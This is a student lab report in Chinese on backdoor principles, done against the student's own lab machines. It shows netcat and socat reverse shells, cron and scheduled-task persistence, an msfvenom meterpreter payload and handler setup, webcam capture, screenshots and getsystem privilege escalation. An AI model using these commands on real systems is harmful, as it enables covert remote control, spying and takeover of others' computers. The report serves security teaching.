20164310Exp2后门原理与实践

一、基础问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式

答:在莫名其妙的网站下载某些莫名奇妙的播放器。

2.例举你知道的后门如何启动起来(win及linux)的方式?

答:对于windows是双击后门软件执行。对于linux,通过cron指令。

3.Meterpreter有哪些给你映像深刻的功能?

答:截屏功能,录音功能,调用摄像头的功能。

4.如何发现自己有系统有没有被安装后门?

答:使用某管家查杀一下就好。

二、使用netcat获取主机操作Shell,cron启动

1.windows获得linux的权限

(1)查阅本机windows ip地址

20164310Exp2后门原理与实践

可知win的ip为192.168.1.157

(2)使用以下代码ncat.exe -l -p 4310 监听4310端口,等着linux链接这个端口

(3)使用命令 nc 192.168.1.157 4310 -e /bin/sh 让linux链接4310端口  

(4)windows获得linux的shell

20164310Exp2后门原理与实践

2.linux获得windows的权限

(1)查阅本机linux ip地址

20164310Exp2后门原理与实践

(2)nc设置监听本地4310端口 nc -l -p 4310

(3)让windows去链接linux的4310端口

20164310Exp2后门原理与实践

(4)linux获得windows的权限

20164310Exp2后门原理与实践

3.nc数据传输

(1)windows监听本地4310端口 ncat.exe -l 4310  linux连接这个端口 nc 192.168.28.157 4310

20164310Exp2后门原理与实践

20164310Exp2后门原理与实践

4.nc定时启动

(1)windows监听本地4310端口 ncat.exe -l -p 4310

(2)crontab指令增加一条定时任务,让他在每小时的第54分钟执行 crontab -e 。

20164310Exp2后门原理与实践

20164310Exp2后门原理与实践

三、使用socat获取主机操作Shell, 任务计划启动

(1)按照步骤创建一个新任务,控制面板->系统和安全->管理工具->任务计划程序,在操作选项(菜单栏)中,选择“创建任务”,填写任务名称ZHYY,之后,新建触发器,选择开始任务时间为:工作站锁定时。

20164310Exp2后门原理与实践

(2)创建完成之后,按 Win+L 快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行(可能会有很多同学出现一个黑屏,这里不用管它)

(3)在终端输入指令 socat - tcp:192.168.1.157:4310  此时可发现已经成功获得了一个windows shell

20164310Exp2后门原理与实践

四、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.用以下代码生成后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=43101 -f exe > 007_backdoor.exe

20164310Exp2后门原理与实践

2.通过nc指令将生成的后门程序传送到Windows主机上,输入后需要在Linux上输入指令ncat -nv

20164310Exp2后门原理与实践

20164310Exp2后门原理与实践

20164310Exp2后门原理与实践

可以在C盘中看到该后门

20164310Exp2后门原理与实践

3.在kali上使用 msfconsole 指令进入msf控制台,然后出现了下面这个奇怪的东西

20164310Exp2后门原理与实践

4.配置参数攻击windows,这里需要把防火墙和杀毒软件全部关掉

(1)先按照以下代码进行配置

use exploit/multi/handler             

set payload windows/meterpreter/reverse_tcp   

show options                    

set LHOST 192.168.31.128              

set LPORT                     

show options                    

exploit                      

发现端口是4444

20164310Exp2后门原理与实践

(2)设置模块、载荷

20164310Exp2后门原理与实践

(3)再次设置主机IP、端口,并再次用 show options 查看是否设置正确,发现设置正确

20164310Exp2后门原理与实践

(4)启用模块

20164310Exp2后门原理与实践

(5)在windows上运行后门程序,并在linux上查看,发现得到了windows远程控制权

20164310Exp2后门原理与实践

五、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.直接输入命令 screenshot 进行截屏,发现截屏记录在root下

20164310Exp2后门原理与实践

2.使用命令webcam_snap进行控制摄像头

20164310Exp2后门原理与实践

3.进行提权

(1)先使用 先使用 getuid 再使用 用 getsystem 指令进行提权

20164310Exp2后门原理与实践

(2)以管理员身份运行后门程序

(3)提权成功

20164310Exp2后门原理与实践

六、实验感想

通过本次实验了解了后门植入原理和如何通过后门去控制其他主机,原理比较简单,也可以想得明白,因为是原理所以和实际操作会有偏差,因为被攻击的电脑有杀软和防火墙,不可能这么容易就被植入后门程序。与此同时也学到了控制权限之后能对受害主机进行的一系列操作,其中印象最深刻的就是控制截屏功能和摄像头的权限,希望在之后的课程中能够进一步地学习后门植入程序,也就是如何才能让后门程序逃过杀毒软件的查杀,或许这是计算机病毒里才可能讲到的内容了。

上一篇:Leecode刷题之旅-C语言/python-344反转字符串


下一篇:查看windows下指定的端口是否开放